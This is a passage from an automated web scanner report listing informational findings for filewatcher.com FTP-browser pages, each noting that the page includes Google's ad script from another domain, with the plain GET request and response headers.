src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.895. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.4/packages/amd64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd/4.4/packages/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.4/packages/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:12 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vSIPjQI60JaLWh+tqW/4Ig"
Content-Length: 24284
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 652
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.4/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.896. http://www.filewatcher.com/b/ftp/ftp.ps.pl.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.ps.pl.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kbobwGx6J6myymo4CPGYAA"
Content-Length: 6249
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 688
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/ - FTP Browser</title>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.897. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.ps.pl/dsk0.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "toIkA4yWlK7H3SCsld4dPw"
Content-Length: 20594
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 691
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ - FTP Browser</t
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.898. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fu1qYVMk+CVZMP5Kr+0s2A"
Content-Length: 8837
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 693
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.899. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YObL+uA/09wDR2eARYK3nw"
Content-Length: 7412
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 693
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/s
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.900. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ALIgsFRQ7pAct6sNv7iJiA"
Content-Length: 6431
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 695
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/s
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.901. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0Gp7jj4drNvFVjFCgzKSEw"
Content-Length: 15413
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 698
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/s
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.902. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.swin.edu.au.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Z1mxB9md+IndS0h5csRrVQ"
Content-Length: 10873
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 614
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/ - FTP Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.903. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.swin.edu.au/freebsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8XNL03R5w704rqsk8CmNFQ"
Content-Length: 13641
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 617
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.904. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.swin.edu.au/freebsd/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "2oOU8S9vCe+Wc3dFuUvAIA"
Content-Length: 7685
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 621
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.905. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZBeQaVacd8y4H1gMZgjjpA"
Content-Length: 5856
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 623
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/al
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.906. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "NBlq4wWpIJY9oFQQmi4rvA"
Content-Length: 24595
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 626
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/al
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.907. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current/news.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sevXUqTGm6Ox9/rvWjCFgQ"
Content-Length: 19429
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 626
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/al
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.908. http://www.filewatcher.com/b/ftp/ftp.uar.net.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uar.net.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "R0ojvCkinrXDBUlfbc9wlg"
Content-Length: 6032
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 758
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/ - FTP Browser</titl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.909. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uar.net/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YZYkFvwnVGBDrGWyqnjOpQ"
Content-Length: 11764
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 626
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/ - FTP Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.910. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub/FreeBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uar.net/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "mXURNGJX9gVhzIj0MzkA0A"
Content-Length: 12443
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 626
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/FreeBSD/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.911. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fMnyvSQoCF+28XYt4/aytw"
Content-Length: 22532
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 629
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/FreeBSD/packages
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.912. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9/news.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
